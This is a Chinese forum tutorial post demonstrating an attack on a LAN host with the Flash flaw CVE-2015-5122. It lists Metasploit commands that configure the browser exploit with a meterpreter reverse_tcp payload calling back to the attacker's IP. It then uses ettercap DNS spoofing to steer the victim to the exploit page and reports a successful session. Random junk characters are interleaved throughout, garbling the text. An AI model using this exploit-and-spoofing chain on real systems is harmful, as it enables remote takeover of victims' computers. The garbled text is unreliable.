|
9 o3 `" N- Y* _" f2 l- R
二、cve2015-5122漏洞实例演示虚拟机 / g6 y9 K* }2 x
( B2 h T$ v% I
2 a- E G2 b% r! T& f! S
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: , ?/ i% i, C* h# ?8 @; V- D ~
2 T/ B& e* y' [& H n+ }' }* C! _9 D
1 j7 ~" r# R( U8 w
search cve-2015-5122如图:
4 e* D1 D9 ^+ ~2 @' M) }0 T
/ H5 e- K4 u" d7 l1 |
/ L7 ~! `2 e# B( R: Z" _+ w( w 3 r# L( r2 Y' p+ ]% t" u
) c) n7 d7 X* a
% t! k+ Z# a0 A2 \' c( O5 y" Y
下面我们敲如下命令:
1 i& {5 J. h# X, |9 Y
7 t9 V- [$ V$ V: L) t
* n7 g6 \; ]2 c" ?# I. U use exploit/multi/browser/adobe_flash_opaque_background_uaf ( J: R3 @) X1 W8 a: B* @6 S
' p' y W8 f0 `6 b; A: ^
, g. ]0 i* [* H/ J* T
set PAYLOAD windows/meterpreter/reverse_tcp
8 Q8 ^ S0 {6 f L( c
" M$ o) N; @! h! F% S8 p/ R0 H; Z' |* q* U2 X( c
set LHOST 192.168.0.109
% F- ~9 U5 X5 P % R5 R) O7 D, a0 G0 H/ f, @
7 l# e( u; S6 k7 M set URIPATH / /*根目录*/ ) {% s0 ~! v4 r W" t) y
. A7 N. W* ^3 Q2 G# O8 Z
3 y, l6 j7 b! X0 M8 e8 p8 w1 i set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 $ h& C( W" X- w
$ D6 {& `$ _3 _: \+ u0 o g0 i- o" w
6 n. s" k+ M3 c5 J7 }- q1 U set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 : l, e" i) |( j
! a" T9 j$ z# U y$ a' `, H
) p( Q4 p$ V: M, F+ W/ k 然后show options如图:
9 V' t/ G% [; K* ~) @ $ M0 ]1 ^& x! u& D4 l! \# u
3 `6 I H' ?1 X9 S( ]6 Q* t
- d. z' o- S) n3 c4 `
) {1 Y: T+ v3 O3 D( I# B! X
! p0 p) c; k# \9 I. H) j' L9 M 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: 4 S# C( \# { B9 E" ]+ x. z
; v6 K1 P+ L' c( k( w
/ G3 k% o# T. {, o5 P
7 D4 ?2 C& U9 c1 |9 q/ S/ X 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 ) W. C9 r, R2 o3 A N4 q
4 W' v- h; o! E- w9 c- _/ B
2 n0 V5 M L, l+ L f8 V2 `
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 4 | @9 F1 n3 U8 D9 l$ K6 K: [% [
+ c. i! D3 v* {" k) |2 _' x
2 V4 @' Y; i# Q 7 n v; r* J5 ~6 s3 Z
! U! O6 B& J, c$ ~7 R4 E
8 F1 ^% M8 U/ Z" y# l
成功了,这时候我们断开ettercap,如图:
! v$ n4 h$ B9 n' \ 1 l @7 `8 \( d% A2 T% f
' @* F" e+ e4 I @5 O( T
% ~ A& i( M1 p8 R' u$ j2 P 8 @0 J& @6 ?8 J. B4 R) h
1 ~) P$ `# g" |& r4 O; b Screenshot如图:
Y# R' f) `" H0 p+ q& R
+ s5 ?' ?% P& P, m* O, b# [8 \
: `; m/ B# o$ s8 e& U9 N5 m9 J' E / L0 a: \# {" {: [' R" F6 ?
: n' }4 [% K& G+ J- A
9 C! I4 t" q3 e& I
) ?) A1 j7 ^) N" ]/ Y |